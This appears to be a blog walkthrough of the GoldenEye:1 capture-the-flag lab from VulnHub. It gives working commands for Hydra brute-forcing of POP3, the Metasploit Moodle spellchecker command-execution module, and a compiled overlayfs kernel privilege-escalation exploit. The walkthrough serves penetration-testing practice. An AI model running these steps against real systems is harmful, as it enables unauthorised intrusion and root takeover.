Hack the Golden Eye:1 (CTF Challenge)

at 8:52 AM Tuesday, July 24, 2018

Welcome to another boot2root CTF challenge “Golden Eye” uploaded by Creosote on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from: https://www.vulnhub.com/entry/goldeneye-1,240/
This lab was very confusing to even begin with due to the lack of description by author, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.
Level: Intermediate
Penetrating Methodologies:
§  Network scanning (Nmap)
§  Surfing HTTP web services
§  Fetched Encoded password
§  Decoding (Burp suite)
§  Brute-Force (Hydra)
§  Connecting to pop3 (Netcat)
§  Extracting password
§  Adding domain Name (/etc/host)
§  Exploring Domain Name over browser
§  Brute-force (Hydra)
§  Login to Server
§  Exploiting Moodle (Metasploit)
§  Kernel post Exploit (overlayfs)
§  Capture the flag

Let’s start
First and foremost we’ll scan the IP address with nmap. In my case, the IP address was 192.168.1.140.
nmap  -p- -A 192.168.1.140 --open


 Since port 80 was opened; so I explored target IP in the web browser. Here we got a little clue for login page /sev-home/ as you can see in the image.




After that we thought to check it’s the source code which lead us to another clue to move ahead. Here we clicked on the link terminal.js as shown in the image.

The terminal.js put-up HTML code in front us. Inside this html code I read the given comment captured hint for two usernames (Boris, Natalya) and a password which was encoded as shown in the below image.


We copied the above encoded text and use brup decoder for decoding HTML encoded text into plain text and obtain “InvincibleHack3r” password.



From the earlier clue of navigating to /sev-home/ to login. We browsed 192.168.1.140/sev-home/ in the browser and we got a clue that it has POP3 service as shown in the image.


Earlier we had enumerated the port 55006 and 55007 was open for unknown service thus we used nmap version scan for them and found ssl/pop3 for 55006 and pop3 for 55007 along their version.


So after getting two usernames we applied brute-force for each users attack with help of following command:

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password: secret1 for username boris as shown in the image.

Similarly with user natalya on port 55007 by using command:
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3.

We got the password: bird for username natalya as shown in the image.

Using Netcat command we have logged in with the username: boris and password: secret1! .This gave us three messages as shown in the image.


Now reading all of the three messages, the clues given in the messages were of no use and are just made to confuse you, as it has wasted our time to make a clue out of it.


Similarly using Netcat command we have logged in with the username: natalya and password: bird. This gave us two messages as shown in the image.

nc 192.168.1.140 55007

After opening all the messages, we saw some clues like username and password, domain name along with a directory name of the domain.
Username: xenia
Password: RCP90rulez!
Domain name: /severnaya-station.com/
Server directory: /gnocertdir

From this point we thought of the adding the servers IP along the domain name into linux /etc/hosts. File.


As you can see in the image we have added the domain named along with servers IP inside /etc/host file in our local machine and saved it.
Next we thought of browsing /gncertdir along with the Domain name.
http://severnaya-station.com/gnocertdir
Ohhh!!!  It was GoldenEye welcome page which was designed with in Moodle CMS, this can be taken as a hint for further use.



Now on further exploring the tabs on the page, inside message box we opened the recent found conversation between Xenia and Doak (another new user).




Then again use hydra for fetching password for doak with help of following command
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password: goat for username doak as shown in the image.


Using Netcat command we have logged in with the username: doak and password: goat .This gave us a message. Now futher reading the message, we acquired a username and password.
Username: dr_doak
Password: 4England!



Now Logging in with the acquired username: dr_doak and password: 4England! into the domains login page as shown in the image. On exploring the all tabs in the navigation section of the page, we saw a s3cret.txt file in my private files.



 So we download s3cret.txt and open it with help of cat command. It gave me the path for jpg image. 



We have downloaded the image file and opened it where we saw an encoded line into base64 format, it made us curious to decode it.
wget http://severnaya-station.com/ /dir007key/for-007.jpg
string for-007.jpg


echo {base64 encode text} | base64 -d
And found xWinter1995x! as plain text which could be any password.


Now further exploring the website we have logged into lead us to TinyMCE HTML editor inside the plugins and text editors tab. Here we have selected Google spell as a spell engine and saved the changes. But it didn’t work here, so I took help of Google.


 After searching for the Moodle Exploit, we found an exploit 29324, here we saw that spell engine selected for tiny MCE is PSpellShell as shown in the image. Here we have also got a clue of a new Username: admin.



So now we have changed the Spell engine to PSpellShell and saved the changes made.


Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln.
use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > set username admin
msf exploit(moodle_cmd_exec) > set password xWinter1995x!
Booom!!! We successfully got command shell session 1.


As we love meterpreter session, so I upgrade it into meterpreter shell.
session -u 1
Then with help of sysinfo we enumerate its kernel, here we focused on Linux version which is 3.13 and if you will search in Google then you find post exploit for  Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation



So we search kernel exploit for linux 3.13 and found exploit 37292 inside kali.
searchsploit linux 3.13
 Then with help of gcc we compile it as shell inside /root direcrtoy.



Then upload the compiled shell file into victim’s machine via meterpreter. Then use python one-liner to access proper terminal and run following command.
python –c 'import pty;pty.spawn("/bin/bash")'
chmod 777 shell
./shell
Unfortunately!! Got error gcc not found.


We saw a message after accessing it that gcc is not currently installed. So to solve this issue we thought some alternative program to gcc and found cc as alternative of it.
By making changes into the original file: 37292.c, we replace gcc to cc as shown in the image.



 We have successfully compiled the exploit using cc command:.
cc 37292.c -o raj


 Now by uploading the shell into the root directory. By giving all the permissions and we have easily access it without any error message.
upload /root/raj
chmod 777 raj
./raj
Yuppiee!! We got root access successfully!! 


Now let’s finish this task by capturing flag.txt form inside /root directory. 



Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)